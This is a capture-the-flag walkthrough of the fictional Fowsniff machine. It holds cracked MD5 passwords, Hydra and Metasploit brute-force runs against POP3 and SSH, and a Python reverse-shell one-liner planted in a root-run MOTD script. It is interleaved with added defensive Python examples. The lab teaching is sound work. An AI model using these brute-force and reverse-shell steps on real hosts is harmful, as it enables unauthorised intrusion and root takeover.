From aldeid

Fowsniff CTF

Hack this machine and get the flag. There are lots of hints along the way and is perfect for beginners!

This boot2root machine is brilliant for new starters. You will have to enumerate this machine by finding open ports, do some online research (it's amazing how much information Google can find for you), decoding hashes, brute forcing a pop3 login and much more!

This will be structured to go through what you need to do, step by step. Make sure you are connected to our network

Credit to berzerk0 for creating this machine. This machine is used here with the explicit permission of the creator <3.

#2 - Using nmap, scan this machine. What ports are open?

Hint: nmap -A -p- -sV

Nmap discovers 4 open ports:

[email protected]:/data/Fowsniff_CTF$ nmap -Pn -sC -sV -A
Starting Nmap 7.80 ( ) at 2020-09-03 17:53 CEST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 996 closed ports
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: Pre-login LOGIN-REFERRALS ID ENABLE SASL-IR more have LITERAL+ post-login capabilities IMAP4rev1 listed OK AUTH=PLAINA0001 IDLE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds
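As an added example (not code from the page or from the room's author), here is a small parser for the nmap service table above. It embeds the page's own output lines, extracts the open ports and versions, and flags the mail services that appear to accept cleartext authentication: POP3 on 110 shows no TLS, and the IMAP capability line advertises `AUTH=PLAIN` without `STARTTLS` (the page's token `AUTH=PLAINA0001` is the capability fused with the IMAP tag by extraction, so a substring match is used). The set of services treated as cleartext is an assumption for this example.

```python
import re

# Service table and capability line copied from the page's nmap output
# (the target IP was elided on the page, so only the per-port lines are used).
NMAP_OUTPUT = """\
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3    Dovecot pop3d
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: Pre-login LOGIN-REFERRALS ID ENABLE SASL-IR more have LITERAL+ post-login capabilities IMAP4rev1 listed OK AUTH=PLAINA0001 IDLE
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\w+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
CAP_RE = re.compile(r"^\|_imap-capabilities:\s*(?P<caps>.*)$")

# Assumption for this example: services that send credentials in clear text
# unless STARTTLS (or an implicit-TLS port) is in use.
CLEARTEXT_SERVICES = {"pop3", "imap", "ftp", "telnet"}


def parse_nmap(text):
    """Turn the per-port lines into dicts; a following NSE capability line is
    attached to the most recent port."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            services.append({
                "port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                "service": m["service"], "version": m["version"].strip(), "caps": [],
            })
            continue
        c = CAP_RE.match(line)
        if c and services:
            services[-1]["caps"] = c["caps"].split()
    return services


def flag_cleartext_auth(services):
    """Return one finding per open cleartext-capable service for which the scan
    shows no STARTTLS; mention plain-text SASL if it was advertised."""
    findings = []
    for s in services:
        if s["state"] != "open" or s["service"] not in CLEARTEXT_SERVICES:
            continue
        caps = " ".join(s["caps"])
        if "STARTTLS" in caps:
            continue
        reason = "no STARTTLS observed"
        if "AUTH=PLAIN" in caps:   # matches the page's fused AUTH=PLAINA0001 token
            reason += "; AUTH=PLAIN advertised"
        findings.append({"port": s["port"], "service": s["service"], "reason": reason})
    return findings


def open_ports(text):
    return [s["port"] for s in parse_nmap(text) if s["state"] == "open"]


if __name__ == "__main__":
    for f in flag_cleartext_auth(parse_nmap(NMAP_OUTPUT)):
        print(f"{f['port']}/{f['service']}: {f['reason']}")
```

Run against the page's scan this reports both mail ports; on a real host the fix is to require STARTTLS (or serve only 995/993) in the Dovecot configuration.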

#3 - Using the information from the open ports. Look around. What can you find?

Connecting to the web server reveals that the company has been attacked:

Fowsniff's internal system suffered a data breach that resulted in the exposure of employee usernames and passwords.

Client information was not affected.

Due to the strong possibility that employee information has been made publicly available, all employees have been instructed to change their passwords immediately.

The attackers were also able to hijack our official @fowsniffcorp Twitter account. All of our official tweets have been deleted and the attackers may release sensitive information via this medium. We are working to resolve this at soon as possible.

We will return to full capacity after a service upgrade.

Searching for the Twitter account (@fowsniffcorp) referred to in the message leads to a tweet with a link to a Pastebin paste.

Below is the content on Pastebin:

           ( o o )
|                            |
|          FOWSNIFF          |
|            got             |
|           PWN3D!!!         |
|                            |         
|       .oooO                |         
|        (   )   Oooo.       |         
+---------\ (----(   )-------+
           \_)    ) /
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!

[email protected]:8a28a94a588a95b80163709ab4313aa4
[email protected]:ae1644dac5b77c0cf51e0d26ad6d7e56
[email protected]:1dc352435fecca338acfd4be10984009
[email protected]:19f5af754c31f1e2651edde9250d69bb
[email protected]:90dc16d47114aa13671c697fd506cf26
[email protected]:a92b8a29ef1183192e3d35187e0cfabd
[email protected]:0e9588cb62f4b6f27e33d449e2ba0b3b
[email protected]:4d6e42f56e127803285a0a7649b5ab11
[email protected]:f7fd98d380735e859f8b2ffbbede5a7e

Fowsniff Corporation Passwords LEAKED!

Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!

MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

l8r n00bz!


This list is entirely fictional and is part of a Capture the Flag educational challenge.

All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.

Any similarities to actual people or entities is purely coincidental and occurred accidentally.

#4 - Using Google, can you find any public information about them?

Hint: There is a pastebin with all of the company employees emails and hashes.

The content discloses email addresses and password hashes.

[email protected]:8a28a94a588a95b80163709ab4313aa4
[email protected]:ae1644dac5b77c0cf51e0d26ad6d7e56
[email protected]:1dc352435fecca338acfd4be10984009
[email protected]:19f5af754c31f1e2651edde9250d69bb
[email protected]:90dc16d47114aa13671c697fd506cf26
[email protected]:a92b8a29ef1183192e3d35187e0cfabd
[email protected]:0e9588cb62f4b6f27e33d449e2ba0b3b
[email protected]:4d6e42f56e127803285a0a7649b5ab11
[email protected]:f7fd98d380735e859f8b2ffbbede5a7e

#5 - Can you decode these md5 hashes? You can even use sites like hashkiller to decode them.

Using an online MD5 lookup service, we can retrieve 8 of the 9 passwords:

Email                  MD5 hash                          Password
[email protected]      8a28a94a588a95b80163709ab4313aa4  mailcall
[email protected]      ae1644dac5b77c0cf51e0d26ad6d7e56  bilbo101
[email protected]      1dc352435fecca338acfd4be10984009  apples01
[email protected]      19f5af754c31f1e2651edde9250d69bb  skyler22
[email protected]      90dc16d47114aa13671c697fd506cf26  scoobydoo2
[email protected]      a92b8a29ef1183192e3d35187e0cfabd  -
[email protected]      0e9588cb62f4b6f27e33d449e2ba0b3b  carp4ever
[email protected]      4d6e42f56e127803285a0a7649b5ab11  orlando12
[email protected]      f7fd98d380735e859f8b2ffbbede5a7e  07011972
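The reason a lookup site answers instantly is that the digests are plain, unsalted MD5: one table computed over a wordlist serves every user. The following added example (not the page's or the room author's code) reproduces that lookup as a precomputed table, runs it against the nine digests from the paste, and contrasts it with a salted, iterated PBKDF2 record, which is what a password store should have held. The candidate list is the page's eight recovered plaintexts standing in for a real wordlist; the PBKDF2 storage format (`salt$iterations$hash`) is an assumption of this example.

```python
import hashlib
import hmac
import os

# The nine leaked MD5 digests, copied from the paste quoted on the page.
LEAKED_MD5 = [
    "8a28a94a588a95b80163709ab4313aa4",
    "ae1644dac5b77c0cf51e0d26ad6d7e56",
    "1dc352435fecca338acfd4be10984009",
    "19f5af754c31f1e2651edde9250d69bb",
    "90dc16d47114aa13671c697fd506cf26",
    "a92b8a29ef1183192e3d35187e0cfabd",
    "0e9588cb62f4b6f27e33d449e2ba0b3b",
    "4d6e42f56e127803285a0a7649b5ab11",
    "f7fd98d380735e859f8b2ffbbede5a7e",
]

# Constructed candidate list: the eight plaintexts the page reports, standing
# in for a wordlist. Lookup sites hold exactly such a table, only far larger.
CANDIDATES = ["mailcall", "bilbo101", "apples01", "skyler22",
              "scoobydoo2", "carp4ever", "orlando12", "07011972"]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def lookup_unsalted_md5(digests, candidates):
    """Return {digest: plaintext} for every leaked digest present in a table
    computed once over the candidates. Nothing per-user went into the digest,
    so one table answers for every account at once."""
    table = {md5_hex(c): c for c in candidates}
    return {d: table[d] for d in digests if d in table}


def crack_leak():
    """Run the table lookup against the page's hash list."""
    return lookup_unsalted_md5(LEAKED_MD5, CANDIDATES)


def pbkdf2_hash(password, salt=None, iterations=200_000):
    """Salted, iterated record 'salt$iterations$hex'. The random salt defeats
    a precomputed table; the iteration count makes every guess expensive."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def pbkdf2_verify(password, stored):
    salt_hex, iterations, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    found = crack_leak()
    for d in LEAKED_MD5:
        print(d, found.get(d, "(not in table)"))
    record = pbkdf2_hash("scoobydoo2")
    print("pbkdf2 record:", record)
    print("verify:", pbkdf2_verify("scoobydoo2", record))
```

Hashing the same password twice with `pbkdf2_hash` yields two different records, which is the property the leaked list lacked: with MD5, identical passwords across users are visible at a glance and every digest can be checked against the same table.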

#6 - Using the usernames and passwords you captured, can you use metasploit to brute force the pop3 login?

Hint: In metasploit there is a package called: auxiliary/scanner/pop3/pop3_login where you can enter all the usernames and passwords you found to brute force this machine's pop3 service.

We can use Metasploit’s pop3_login module to brute force the POP3 service using the credentials found previously.

[email protected]:/data/Fowsniff_CTF/files$ msfconsole -q
[*] Starting persistent handler(s)...
msf5 > use auxiliary/scanner/pop3/pop3_login 
msf5 auxiliary(scanner/pop3/pop3_login) > show options

Module options (auxiliary/scanner/pop3/pop3_login):

   Name              Current Setting                                                    Required  Description
   ----              ---------------                                                    --------  -----------
   BLANK_PASSWORDS   false                                                              no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                  yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                              no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                              no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                              no        Add all users in the current database to the list
   PASSWORD                                                                             no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt  no        The file that contains a list of probable passwords.
   RHOSTS                                                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             110                                                                yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                                              yes       Stop guessing when a credential works for a host
   THREADS           1                                                                  yes       The number of concurrent threads (max one per host)
   USERNAME                                                                             no        A specific username to authenticate as
   USERPASS_FILE                                                                        no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                              no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/unix_users.txt      no        The file that contains a list of probable users accounts.
   VERBOSE           true                                                               yes       Whether to print output for all attempts

msf5 auxiliary(scanner/pop3/pop3_login) > set rhost
rhost =>
msf5 auxiliary(scanner/pop3/pop3_login) > set user_file /data/Fowsniff_CTF/files/usernames.txt
user_file => /data/Fowsniff_CTF/files/usernames.txt
msf5 auxiliary(scanner/pop3/pop3_login) > set pass_file /data/Fowsniff_CTF/files/passwords.txt
pass_file => /data/Fowsniff_CTF/files/passwords.txt
msf5 auxiliary(scanner/pop3/pop3_login) > run

[-]      - - Failed: 'mauer:mailcall', '-ERR [AUTH] Authentication failed.'
[!]      - No active DB -- Credential data will not be saved!
[-]      - - Failed: 'mauer:bilbo101', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'mauer:apples01', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'mauer:skyler22', ''
[-]      - - Failed: 'mauer:scoobydoo2', ''
[-]      - - Failed: 'mauer:carp4ever', ''
[-]      - - Failed: 'mauer:orlando12', ''
[-]      - - Failed: 'mauer:07011972', ''
[-]      - - Failed: 'mustikka:mailcall', ''
[-]      - - Failed: 'mustikka:bilbo101', ''
[-]      - - Failed: 'mustikka:apples01', ''
[-]      - - Failed: 'mustikka:skyler22', ''
[-]      - - Failed: 'mustikka:scoobydoo2', ''
[-]      - - Failed: 'mustikka:carp4ever', ''
[-]      - - Failed: 'mustikka:orlando12', ''
[-]      - - Failed: 'mustikka:07011972', ''
[-]      - - Failed: 'tegel:mailcall', ''
[-]      - - Failed: 'tegel:bilbo101', ''
[-]      - - Failed: 'tegel:apples01', ''
[-]      - - Failed: 'tegel:skyler22', ''
[-]      - - Failed: 'tegel:scoobydoo2', ''
[-]      - - Failed: 'tegel:carp4ever', ''
[-]      - - Failed: 'tegel:orlando12', ''
[-]      - - Failed: 'tegel:07011972', ''
[-]      - - Failed: 'baksteen:mailcall', ''
[-]      - - Failed: 'baksteen:bilbo101', ''
[-]      - - Failed: 'baksteen:apples01', ''
[-]      - - Failed: 'baksteen:skyler22', ''
[-]      - - Failed: 'baksteen:scoobydoo2', ''
[-]      - - Failed: 'baksteen:carp4ever', ''
[-]      - - Failed: 'baksteen:orlando12', ''
[-]      - - Failed: 'baksteen:07011972', ''
[-]      - - Failed: 'seina:mailcall', ''
[-]      - - Failed: 'seina:bilbo101', ''
[-]      - - Failed: 'seina:apples01', ''
[-]      - - Failed: 'seina:skyler22', ''
[+]      - - Success: 'seina:scoobydoo2' '+OK Logged in.  '
[-]      - - Failed: 'stone:mailcall', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'stone:bilbo101', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'stone:apples01', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'stone:skyler22', ''

However, Hydra is faster:

[email protected]:/data/Fowsniff_CTF/files$ hydra -L usernames.txt -P passwords.txt pop3://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-09-03 19:05:30
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 72 login tries (l:9/p:8), ~5 tries per task
[DATA] attacking pop3://
[110][pop3] host:   login: seina   password: scoobydoo2
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-09-03 19:06:24

We confirm that 1 account is still valid: seina:scoobydoo2
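From the server's side, both runs above leave a very recognisable trace: one source address failing against user after user within seconds, then one success. The following added example (not from the page or the room author) shows the detection logic for that pattern over constructed Dovecot `pop3-login` log lines. The line format is modelled on Dovecot's "auth failed" and "Login:" messages but is an assumption here, as are the addresses and thresholds; the page only shows the client side.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample, modelled on Dovecot pop3-login lines (format assumed).
# It mirrors the page's run: one source tries several users, then succeeds
# as seina; a second source is an ordinary user mistyping once.
SAMPLE_LOG = """\
Sep  3 19:05:31 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mauer>, method=PLAIN, rip=192.0.2.10, lip=192.0.2.20, session=<a1>
Sep  3 19:05:33 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mustikka>, method=PLAIN, rip=192.0.2.10, lip=192.0.2.20, session=<a2>
Sep  3 19:05:35 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=192.0.2.10, lip=192.0.2.20, session=<a3>
Sep  3 19:05:37 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<baksteen>, method=PLAIN, rip=192.0.2.10, lip=192.0.2.20, session=<a4>
Sep  3 19:05:39 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<seina>, method=PLAIN, rip=192.0.2.10, lip=192.0.2.20, session=<a5>
Sep  3 19:05:42 fowsniff dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=192.0.2.10, lip=192.0.2.20, mpid=2211, session=<a6>
Sep  3 19:10:02 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 5 secs): user=<stone>, method=PLAIN, rip=192.0.2.30, lip=192.0.2.20, session=<b1>
Sep  3 19:10:09 fowsniff dovecot: pop3-login: Login: user=<stone>, method=PLAIN, rip=192.0.2.30, lip=192.0.2.20, mpid=2230, session=<b2>
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<outcome>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>"
    r".*\brip=(?P<rip>[\d.]+)"
)


def parse_events(text):
    """One dict per login attempt: timestamp (syslog has no year), user,
    remote IP and whether the attempt succeeded."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append({"ts": ts, "user": m["user"], "rip": m["rip"],
                       "ok": m["outcome"] == "Login"})
    return events


def detect(events, window_secs=60, min_users=3, min_failures=3):
    """Two rules, evaluated per source address:
    spray: failures against >= min_users distinct users inside the window
    success_after_failures: a login that follows >= min_failures failures
    from the same source inside the window (the credential that 'worked')."""
    by_rip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_rip[e["rip"]].append(e)
    findings = []
    for rip, evs in by_rip.items():
        sprayed = False
        for i, e in enumerate(evs):
            recent_fail = [x for x in evs[:i + 1] if not x["ok"]
                           and (e["ts"] - x["ts"]).total_seconds() <= window_secs]
            users = sorted({x["user"] for x in recent_fail})
            if not e["ok"] and not sprayed and len(users) >= min_users:
                sprayed = True   # report each source once
                findings.append({"rule": "spray", "rip": rip, "users": users, "at": e["ts"]})
            if e["ok"] and len(recent_fail) >= min_failures:
                findings.append({"rule": "success_after_failures", "rip": rip,
                                 "user": e["user"], "failures": len(recent_fail), "at": e["ts"]})
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_LOG)):
        print(f)
```

The second rule is the one worth alerting on: the account it names (here seina) is the one whose password survived the breach unchanged, which is precisely the account to lock and reset first.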

#7 - What was seina’s password to the email service?

Answer: scoobydoo2

#8 - Can you connect to the pop3 service with her credentials? What email information can you gather?

Hint: Use netcat with the port 110 to view her emails. nc <ip> 110

Let’s connect to the POP3 service. We successfully connect as seina and find 2 emails.

$ telnet 110
Connected to
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
pass scoobydoo2
+OK Logged in.
+OK 2 messages:
1 1622
2 1280

First email:

retr 1
+OK 1622 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by fowsniff (Postfix, from userid 1000)
    id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: [email protected], [email protected], [email protected],
    [email protected], [email protected], [email protected], [email protected],
    [email protected]
Subject: URGENT! Security EVENT!
Message-Id: <[email protected]>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: [email protected] (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via 
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

A.J Stone


Second email:

retr 2
+OK 1280 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by fowsniff (Postfix, from userid 1004)
    id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: [email protected]
Subject: You missed out!
Message-Id: <[email protected]>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: [email protected]


You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup. 
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,


PS: Make sure you change your email password. 
AJ had been telling us to do that right before Captain Profanity showed up.


#9 - Looking through her emails, what was a temporary password set for her?

Answer: S1ck3nBluff+secureshell

#10 - In the email, who sent it? Using the password from the previous question and the sender's username, connect to the machine using SSH.

Extracting the list of recipients of the email, we can use hydra to confirm which user has not changed the temporary password:

[email protected]:/data/Fowsniff_CTF/files$ hydra -L sshusers.txt -p S1ck3nBluff+secureshell ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-09-03 20:14:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking ssh://
[22][ssh] host:   login: baksteen   password: S1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-09-03 20:14:47

We can now connect as baksteen against the SSH service:

$ ssh [email protected]

#11 - Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group?


Baksteen belongs to the users group. Listing the files owned by this group reveals an interesting file (a shell script):

[email protected]:~$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)
[email protected]:~$ find / -type f -group users 2>/dev/null

The script /opt/cube/ is interesting because it prints the banner displayed when we connect to the SSH service. Moreover, our user can modify it.

[email protected]:/data/Fowsniff_CTF/files$ ssh [email protected]
[email protected]'s password: 

                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions

   ****  Welcome to the Fowsniff Corporate Server! **** 

              ---------- NOTICE: ----------

 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.

Last login: Tue Mar 13 16:55:40 2018 from

This means that we can replace its content with a reverse shell.

#12 - Now you have found a file that can be edited by the group, can you edit it to include a reverse shell?

We can get a python reverse shell from pentestmonkey. Let’s replace the content of /opt/cube/ with this code:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


If you have not found out already, this file is run as root when a user connects to the machine using SSH. We know this as when we first connect we can see we get given a banner (with fowsniff corp). Look in /etc/update-motd.d/ file. If (after we have put our reverse shell in the cube file) we then include this file in the motd.d file, it will run as root and we will get a reverse shell as root!

Hint: Run the cube file to the motd.d file.

We can confirm that the /opt/cube/ script is invoked from /etc/update-motd.d/00-header. The scripts in /etc/update-motd.d/ generate the message of the day shown on an SSH login, and they are run as root (by pam_motd) each time a user connects.

[email protected]:/etc/update-motd.d$ grep cube *
00-header:sh /opt/cube/
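The root cause here is a root-executed script chain that reaches a file a non-root group can write. The following added example (not the page's or the room author's code) is the audit a defender would run on such a host: it walks an update-motd.d directory, collects every absolute path each script mentions, and reports any file that is not root-owned or is group- or world-writable. `run_demo()` builds a constructed fixture in a temporary directory that mirrors the page's layout; the script name `cube.sh` is an assumption, since the page elides it.

```python
import os
import re
import stat
import tempfile

# Any absolute path token inside a script: the interpreter in the shebang,
# files run with "sh /path", sourced files, binaries called by full path.
PATH_RE = re.compile(r"(?<![\w./-])(/[\w./-]+)")


def writable_reasons(path):
    """Reasons a non-root user could alter what root will execute from path."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != 0:
        reasons.append("not owned by root (uid %d)" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_motd_dir(motd_dir):
    """Check each motd script and every existing file it references."""
    findings = []
    for name in sorted(os.listdir(motd_dir)):
        script = os.path.join(motd_dir, name)
        if not os.path.isfile(script):
            continue
        with open(script, errors="replace") as fh:
            text = fh.read()
        referenced = sorted(p for p in set(PATH_RE.findall(text)) if os.path.isfile(p))
        for target in [script] + referenced:
            reasons = writable_reasons(target)
            if reasons:
                findings.append({"script": script, "path": target, "reasons": reasons})
    return findings


def run_demo():
    """Constructed fixture: a 00-header that runs one group-writable script
    (the page's misconfiguration) and one correctly permissioned script."""
    root = tempfile.mkdtemp(prefix="motd-audit-")
    motd = os.path.join(root, "update-motd.d")
    cube_dir = os.path.join(root, "opt", "cube")
    os.makedirs(motd)
    os.makedirs(cube_dir)
    cube = os.path.join(cube_dir, "cube.sh")        # name assumed
    safe = os.path.join(cube_dir, "banner-ok.sh")   # control file
    for path in (cube, safe):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho banner\n")
    os.chmod(cube, 0o664)   # rw for the group, as on the CTF box
    os.chmod(safe, 0o644)
    header = os.path.join(motd, "00-header")
    with open(header, "w") as fh:
        fh.write(f"#!/bin/sh\nsh {cube}\nsh {safe}\n")
    os.chmod(header, 0o755)
    return audit_motd_dir(motd)


if __name__ == "__main__":
    for f in run_demo():
        print(f["path"], "<-", f["script"], ":", ", ".join(f["reasons"]))
```

Run as an unprivileged user the demo also reports the fixture files as "not owned by root", which is the correct answer for files under a temporary directory; on the real host only root-owned, non-group-writable files should appear anywhere in the chain. The fix on the CTF box is simply `chmod 755` plus root ownership on the script, or dropping the call from 00-header.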

#14 - Start a netcat listener (nc -lvp 1234) and then re-login to the SSH service. You will then receive a reverse shell on your netcat session as root!

Let’s disconnect from our SSH session, and open a listener (adapt the port to fit with the one mentioned in the reverse shell):

$ rlwrap nc -nlvp 4444

Now, when we reconnect with SSH, we get a root shell in the listener window:

[email protected]:/data/Fowsniff_CTF/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 38714
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
total 28
drwx------  4 root root 4096 Mar  9  2018 .
drwxr-xr-x 22 root root 4096 Mar  9  2018 ..
-rw-r--r--  1 root root 3117 Mar  9  2018 .bashrc
drwxr-xr-x  2 root root 4096 Mar  9  2018 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  5 root root 4096 Mar  9  2018 Maildir
-rw-r--r--  1 root root  582 Mar  9  2018 flag.txt
# cat flag.txt
   ___                        _        _      _   _             _ 
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)

  |    R O O T   |
  |    F L A G   |

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.